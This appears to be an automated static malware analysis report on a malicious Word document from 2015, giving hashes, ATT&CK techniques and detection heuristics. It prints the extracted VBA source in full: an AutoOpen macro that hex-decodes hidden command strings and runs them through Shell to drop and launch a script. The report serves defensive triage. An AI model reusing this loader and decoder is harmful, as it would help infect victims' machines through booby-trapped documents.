Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2ae16de2ce0f90a0…

MALICIOUS

Office (OLE)

Size: 35.0 KB
Created: 2015-03-18 23:09:00
Authoring application: Microsoft Office Word
First seen: 2015-04-15
MD5: 5dab27a18a2851cf1dcae95662a01906
SHA-1: fc7ebf9cbc7e5e794474775b3ca457cacde46d6a
SHA-256: 2ae16de2ce0f90a0f921946a2a43d4b5220eff195f3e4cde23c3e67a8173f8b3
Risk Score: 170

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample triggered a critical heuristic for an obfuscated auto-exec VBA loader, indicating malicious intent. The VBA script decodes a hex string into a PowerShell command and attempts to execute it, which likely downloads and runs a second-stage payload. The script also constructs a temporary file path 'dffsdf.exe' for execution.

Heuristics (6)

  • VBA macros detected (severity: medium; 3 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA (severity: critical) OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script: Shell sdddd, 0
  • Obfuscated auto-exec VBA loader (severity: critical) OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script: Shell sdddd, 0
  • AutoOpen macro (severity: low) OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script: Sub autoopen()
  • Legacy WordBasic auto-exec macro marker (severity: medium) OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact (severity: info) EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3015 bytes
SHA-256: 337a02b601b2f5526861314b997f4da6f2c0b6ec50dbce30914cd8d739aca416
Detection:
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 long base64-like blob(s).
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
sdf
End Sub

Attribute VB_Name = "Module1"
Sub sdf()
jFHGVCsdf = HJbjbkljgIUGI("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")
JJKJJJJJJJJJJJJd = HJbjbkljgIUGI(StrReverse("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"))
GFGsdjfhf = HJbjbkljgIUGI("406563686f20202020202e73617665746f66696c652046696c656f70656e2c2032203e3e677975465946477569672e766273202620406563686f20656e6420776974683e3e677975465946477569672e766273202620406563686f205365742047424976697669753637465547424b203d204372656174654f626a65637428225368656c6c2e4170706c69636174696f6e22293e3e677975465946477569672e766273202620406563686f2047424976697669753637465547424b2e4f70656e2046696c656f70656e3e3e677975465946477569672e766273202620637363726970742e65786520677975465946477569672e766273")
sdddd = JJKJJJJJJJJJJJJd + jFHGVCsdf + GFGsdjfhf
Shell sdddd, 0
End Sub


Attribute VB_Name = "Module2"
Public Function HJbjbkljgIUGI(ByVal kZtkbozi As String) As String
Dim CqINRagdDXnLii12, JvigRuKAuHzAIK17 As Integer
JvigRuKAuHzAIK17 = 2912
For CqINRagdDXnLii12 = 0 To 65
JvigRuKAuHzAIK17 = JvigRuKAuHzAIK17 + CqINRagdDXnLii12
DoEvents
Next CqINRagdDXnLii12

For TQmHIRcQAPjC = 1 To Len(kZtkbozi) Step 2
UGiEQf = Chr$(Val(Chr$(38) & Chr$(72) & Mid$(kZtkbozi, TQmHIRcQAPjC, 2)))
ePUuigaspLiGL = ePUuigaspLiGL & UGiEQf
Next TQmHIRcQAPjC
HJbjbkljgIUGI = ePUuigaspLiGL
End Function